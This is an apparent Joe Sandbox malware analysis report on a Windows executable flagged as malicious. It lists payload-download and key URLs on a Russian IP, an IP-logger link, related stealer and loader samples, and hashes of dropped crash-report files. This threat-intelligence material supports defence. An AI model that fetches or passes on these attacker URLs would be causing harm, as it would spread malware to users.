https://g-cleanit.hknRGKqzVQRt.exe, 00000000.00000003.2544167124.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544198660.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543219760.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544114531.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543263255.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalseunknown
http://upx.sf.netAmcache.hve.4.drfalse
  • URL Reputation: safe
unknown
http://80.66.75.114/dll/downloadCnRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpfalseunknown
http://80.66.75.114/dll/key%SnRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpfalse
    		unknown
    http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174nRGKqzVQRt.exe, 00000000.00000003.2544167124.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544198660.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543219760.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544114531.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543263255.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
      		unknown
      https://iplogger.org/1Pz8p7nRGKqzVQRt.exe, 00000000.00000003.2544167124.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544198660.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543219760.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544114531.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543263255.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalseunknown
      http://80.66.75.114/name5o1nRGKqzVQRt.exe, 00000000.00000002.2604107405.000000000081D000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        http://80.66.75.114/soft/download?nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpfalseunknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        80.66.75.114
        		unknownRussian Federation
        		20803RISS-ASRUfalse

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1528608
        Start date and time:2024-10-08 04:23:05 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 7m 3s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:23
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:nRGKqzVQRt.exe
        renamed because original name is a hash value
        Original Sample Name:75c689774e5b58a3c4ced392928b6053.exe
        Detection:MAL
        Classification:mal100.evad.winEXE@9/44@0/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 99%
        • Number of executed functions: 23
        • Number of non-executed functions: 199
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 20.189.173.22
        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        22:24:43API Interceptor2x Sleep call for process: WerFault.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        80.66.75.114BDY5OFXpM9.exeGet hashmaliciousUnknownBrowse
        • 80.66.75.114/soft/download
        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
        • 80.66.75.114/soft/download
        univ.exeGet hashmaliciousUnknownBrowse
        • 80.66.75.114/soft/download
        univ.exeGet hashmaliciousUnknownBrowse
        • 80.66.75.114/soft/download
        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
        • 80.66.75.114/dl?name=mixnine
        file.exeGet hashmaliciousClipboard Hijacker, Cryptbot, Neoreklami, Socks5SystemzBrowse
        • 80.66.75.114/dl?name=mixnine.exe
        file.exeGet hashmaliciousUnknownBrowse
        • 80.66.75.114/soft/download
        CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
        • 80.66.75.114/soft/download
        t2UZUYgpKV.exeGet hashmaliciousGCleanerBrowse
        • 80.66.75.114/files/download
        4cxqNGB7N2.exeGet hashmaliciousGCleanerBrowse
        • 80.66.75.114/files/download

        Domains

        No context

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        RISS-ASRUBDY5OFXpM9.exeGet hashmaliciousUnknownBrowse
        • 80.66.75.114
        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
        • 80.66.75.114
        univ.exeGet hashmaliciousUnknownBrowse
        • 80.66.75.114
        univ.exeGet hashmaliciousUnknownBrowse
        • 80.66.75.114
        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
        • 80.66.75.114
        file.exeGet hashmaliciousClipboard Hijacker, Cryptbot, Neoreklami, Socks5SystemzBrowse
        • 80.66.75.114
        file.exeGet hashmaliciousUnknownBrowse
        • 80.66.75.114
        CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
        • 80.66.75.114
        t2UZUYgpKV.exeGet hashmaliciousGCleanerBrowse
        • 80.66.75.114
        4cxqNGB7N2.exeGet hashmaliciousGCleanerBrowse
        • 80.66.75.114

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]BDY5OFXpM9.exeGet hashmaliciousUnknownBrowse
          file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
            univ.exeGet hashmaliciousUnknownBrowse
              univ.exeGet hashmaliciousUnknownBrowse
                file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                  file.exeGet hashmaliciousUnknownBrowse
                    CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                      SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.589.31532.exeGet hashmaliciousUnknownBrowse
                          file.exeGet hashmaliciousGCleaner, NymaimBrowse
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1]BDY5OFXpM9.exeGet hashmaliciousUnknownBrowse
                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                univ.exeGet hashmaliciousUnknownBrowse
                                  univ.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                      file.exeGet hashmaliciousUnknownBrowse
                                        CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                                          SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exeGet hashmaliciousUnknownBrowse
                                            SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.589.31532.exeGet hashmaliciousUnknownBrowse
                                              file.exeGet hashmaliciousGCleaner, NymaimBrowse

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nRGKqzVQRt.exe_96cca49e4bf4c34aa7c2fc23543654f721481d5_34ddec4d_08310f16-b122-4177-906b-6fa498f8123b\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9845922454673502
                                                Encrypted:false
                                                SSDEEP:96:lnPGuuwsvhqkoW7RM6tQXIDcQBc6Wu2hcE6cw33+HbHg/8BRTf32rLWIOy4Hov9u:dPGuuwJJ0PKAAjhUVBzuiFeZ24IO8O
                                                MD5:C80D43C5DD6C679972945225610CE419
                                                SHA1:84C9880672B1BB874EAC3F094CAC01984FD187AE
                                                SHA-256:7952B44BDEB11F34A9FD8B1E214C99ED4DEB6EA68A1EE9037DF633C4BA13DCF7
                                                SHA-512:A3D9BD57F49F3658FD16A349D245CB84E68808E3F87660BF29DD5AD33759C93ABA4F52F8E2EACFD343FC6BE5C2554492CCB692A416D919F8C7E3826A8692A307
                                                Malicious:true
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.7.8.8.3.3.7.9.1.0.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.2.7.8.8.3.7.2.2.8.5.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.3.1.0.f.1.6.-.b.1.2.2.-.4.1.7.7.-.9.0.6.b.-.6.f.a.4.9.8.f.8.1.2.3.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.b.d.f.8.a.5.-.7.6.d.c.-.4.5.8.3.-.8.b.a.1.-.4.1.9.b.2.9.6.e.1.3.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.R.G.K.q.z.V.Q.R.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.8.c.-.0.0.0.1.-.0.0.1.5.-.4.4.4.2.-.7.f.2.3.2.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.a.d.7.1.0.4.1.4.0.0.f.3.4.0.1.d.a.c.9.9.2.a.a.4.7.d.c.0.a.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.6.d.f.7.9.1.2.4.6.e.3.c.f.6.6.e.a.c.a.1.2.d.9.8.c.0.d.9.2.a.6.8.6.4.2.3.3.1.6.f.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nRGKqzVQRt.exe_a79f8132bcca3db4bb8567b6b2e85625dcb38718_34ddec4d_bbfd8e7e-5e70-4d31-a4e6-19ea7dc199a6\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9750265064621326
                                                Encrypted:false
                                                SSDEEP:96:WvugGu0svhqk97qxn3QXIDcQQc6McEpcw3v9+HbHg/8BRTf32rLWIOy4Hov9mEDj:klGu0J5m0uITTajhUVBzuiFeZ24IO8L
                                                MD5:CE58BD55D084C1554DF5D416958FEB73
                                                SHA1:3C07603E7F49EAD0F519BCC8024B95E9D36DDD41
                                                SHA-256:703DE8008F47E99727584130FA4C3A61474C6F46D5155DA583D2E3D4DF3CDE8C
                                                SHA-512:CEB855F5129EA52A629C7A3149C36ADEE215BC8C6EC78B9D21EF78CF0DE67580DC499B3F1C68B95341E19C9CCD5064F2C9857E5A281F0A93483C28DF892A62BC
                                                Malicious:true
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.7.8.8.0.3.4.4.2.5.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.2.7.8.8.0.8.5.9.8.9.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.f.d.8.e.7.e.-.5.e.7.0.-.4.d.3.1.-.a.4.e.6.-.1.9.e.a.7.d.c.1.9.9.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.f.4.d.e.8.3.5.-.6.6.4.4.-.4.e.1.8.-.b.2.2.0.-.1.e.e.5.b.7.d.4.d.4.b.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.R.G.K.q.z.V.Q.R.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.8.c.-.0.0.0.1.-.0.0.1.5.-.4.4.4.2.-.7.f.2.3.2.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.a.d.7.1.0.4.1.4.0.0.f.3.4.0.1.d.a.c.9.9.2.a.a.4.7.d.c.0.a.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.6.d.f.7.9.1.2.4.6.e.3.c.f.6.6.e.a.c.a.1.2.d.9.8.c.0.d.9.2.a.6.8.6.4.2.3.3.1.6.f.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nRGKqzVQRt.exe_b852f8d9db928673607680cdcdacfddad4b1959_34ddec4d_05259ca6-5fda-47fb-ab1d-47161bf9fb00\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8393483897477912
                                                Encrypted:false
                                                SSDEEP:96:MzqGuWsvhqkoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf32rLWIOy4Hov9mEr:MOGuWJM056rAjhKzuiF5Z24IO8O
                                                MD5:0936B836EF6D793A641BEB812FB4186C
                                                SHA1:CEA6AED7EF57317BF500A993416494E5FA517502
                                                SHA-256:EF9A5BC1D457C57A7ABCAC2652ECCA0A8FFC26E59FEA59C48889088CBFF7E40B
                                                SHA-512:F1AC061D0AD4DDA155FDFF79160B7FEBF47D01CFEF2360134FC1B8B3F477B18A77AB7AE9009704258B1C59529D09132565BFC2C944D907562E7EF33AC880E4EC
                                                Malicious:true
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.7.8.4.5.5.4.1.4.0.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.5.2.5.9.c.a.6.-.5.f.d.a.-.4.7.f.b.-.a.b.1.d.-.4.7.1.6.1.b.f.9.f.b.0.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.5.6.1.0.4.0.-.3.8.a.9.-.4.e.d.5.-.a.5.6.2.-.1.1.e.1.b.5.f.7.4.d.f.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.R.G.K.q.z.V.Q.R.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.8.c.-.0.0.0.1.-.0.0.1.5.-.4.4.4.2.-.7.f.2.3.2.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.a.d.7.1.0.4.1.4.0.0.f.3.4.0.1.d.a.c.9.9.2.a.a.4.7.d.c.0.a.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.6.d.f.7.9.1.2.4.6.e.3.c.f.6.6.e.a.c.a.1.2.d.9.8.c.0.d.9.2.a.6.8.6.4.2.3.3.1.6.f.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.7.:.0.2.:.3.4.:.3.3.!.0.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nRGKqzVQRt.exe_b852f8d9db928673607680cdcdacfddad4b1959_34ddec4d_8abba573-3b10-4949-bccc-6f9c0a241678\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8395014689465913
                                                Encrypted:false
                                                SSDEEP:96:rn1RGuasvhqkoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf32rLWIOy4Hov9me:zjGuaJM056rAjhKzuiF5Z24IO8O
                                                MD5:313CC607C8B2266A85E8607968C750E2
                                                SHA1:5D1655560129EC5F8EC34BC3423704B324E4DA93
                                                SHA-256:4138D4DE2360EE50C17A407346F03773702F730E998ACBDD8B7DDFA60248F93E
                                                SHA-512:3A4573DF8A7FA27BE5F6471207F44A0D9717158F1E7B2B59A6A29D64A0571C99D009FA765310DF47777321378433AAD4F9F6FAC6903B632E31CE355EE49CD6E2
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.7.8.4.4.1.3.9.4.2.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.b.b.a.5.7.3.-.3.b.1.0.-.4.9.4.9.-.b.c.c.c.-.6.f.9.c.0.a.2.4.1.6.7.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.3.d.e.f.0.c.-.b.4.f.3.-.4.0.e.5.-.8.c.b.8.-.6.1.0.8.9.b.6.6.0.5.2.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.R.G.K.q.z.V.Q.R.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.8.c.-.0.0.0.1.-.0.0.1.5.-.4.4.4.2.-.7.f.2.3.2.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.a.d.7.1.0.4.1.4.0.0.f.3.4.0.1.d.a.c.9.9.2.a.a.4.7.d.c.0.a.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.6.d.f.7.9.1.2.4.6.e.3.c.f.6.6.e.a.c.a.1.2.d.9.8.c.0.d.9.2.a.6.8.6.4.2.3.3.1.6.f.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.7.:.0.2.:.3.4.:.3.3.!.0.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nRGKqzVQRt.exe_b852f8d9db928673607680cdcdacfddad4b1959_34ddec4d_c90bd162-8e24-4dab-882c-185572e12616\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8392759670559924
                                                Encrypted:false
                                                SSDEEP:96:gYcFfGuJsvhqkoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf32rLWIOy4Hov9B:N8GuJJM056rAjhKzuiF5Z24IO8O
                                                MD5:4989F622C43C00557F052394EA0E089F
                                                SHA1:295B318D176010E6F61FBB1F3D241016211C070D
                                                SHA-256:C334EE7476D615B2DA4848E5CA5F076B78EB4FEAA6074469A676DD831626BCFB
                                                SHA-512:47A5F34D45D892F3E553FDF358B71501F600A8EAF5553906FD06F986816F7292B128A3890D6537164292F58E7F1D0AC4A0BBCD6E56849FB93CD3B2B474BDF74C
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.7.8.4.4.8.7.1.5.3.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.0.b.d.1.6.2.-.8.e.2.4.-.4.d.a.b.-.8.8.2.c.-.1.8.5.5.7.2.e.1.2.6.1.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.4.c.b.a.2.d.c.-.3.f.2.b.-.4.6.0.8.-.9.f.7.7.-.4.a.6.8.2.1.e.4.0.9.c.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.R.G.K.q.z.V.Q.R.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.8.c.-.0.0.0.1.-.0.0.1.5.-.4.4.4.2.-.7.f.2.3.2.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.a.d.7.1.0.4.1.4.0.0.f.3.4.0.1.d.a.c.9.9.2.a.a.4.7.d.c.0.a.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.6.d.f.7.9.1.2.4.6.e.3.c.f.6.6.e.a.c.a.1.2.d.9.8.c.0.d.9.2.a.6.8.6.4.2.3.3.1.6.f.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.7.:.0.2.:.3.4.:.3.3.!.0.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nRGKqzVQRt.exe_b852f8d9db928673607680cdcdacfddad4b1959_34ddec4d_c90fdb66-40d1-4f87-8995-8ec3b1052dc7\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8550835747720145
                                                Encrypted:false
                                                SSDEEP:96:Z0lGudsvhqkoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf32rLWIOy4Hov9mEV:QGudJM056rAjhgzuiF5Z24IO8O
                                                MD5:CFE700DCF281D7EC293B8E65737877B8
                                                SHA1:5C54B7C0E588FDF3A6C4EB48458CEB8EAD7163EF
                                                SHA-256:F08684BEB875C27F48125937F9AE913044C5D81441BA3BD7AD7F2375F3250350
                                                SHA-512:A894283BDC76DB72479EFF72086E560F7DE5E3A9C12D14CB8E706782BD126EE22C77B5F663B37EE18A209D803F245B72E7812FB92E34F765AE62A74A41F4B544
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.7.8.4.7.5.7.6.9.7.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.0.f.d.b.6.6.-.4.0.d.1.-.4.f.8.7.-.8.9.9.5.-.8.e.c.3.b.1.0.5.2.d.c.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.4.2.3.6.4.e.-.6.1.4.8.-.4.7.2.c.-.b.8.6.7.-.d.f.4.a.e.0.6.2.1.8.7.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.R.G.K.q.z.V.Q.R.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.8.c.-.0.0.0.1.-.0.0.1.5.-.4.4.4.2.-.7.f.2.3.2.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.a.d.7.1.0.4.1.4.0.0.f.3.4.0.1.d.a.c.9.9.2.a.a.4.7.d.c.0.a.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.6.d.f.7.9.1.2.4.6.e.3.c.f.6.6.e.a.c.a.1.2.d.9.8.c.0.d.9.2.a.6.8.6.4.2.3.3.1.6.f.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.7.:.0.2.:.3.4.:.3.3.!.0.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nRGKqzVQRt.exe_b852f8d9db928673607680cdcdacfddad4b1959_34ddec4d_d5e694f9-d00b-44c6-955c-c0802dc13cf9\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8390691430591861
                                                Encrypted:false
                                                SSDEEP:96:ZLuU4hGuSsvhqkoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf32rLWIOy4Hovz:Fb0GuSJM056rAjhKzuiF5Z24IO8O
                                                MD5:2B4B24A7BF6367208E72E85471C51B53
                                                SHA1:8D5B29114EE07546BA41895A03CDC6FEA6807C17
                                                SHA-256:0B8B5676FFDA78DED54ACDEBD8875DA7EB23DB155C03256118A626339AE26A82
                                                SHA-512:19974D9EE09A285E936B2C9F1AB94F76079E161907039046F95F934E7970ACA5AF293F584A6942C9FF64F8D5B481743ED4FD2729F503BEB5038D1ED4B5B5A430
                                                Malicious:true
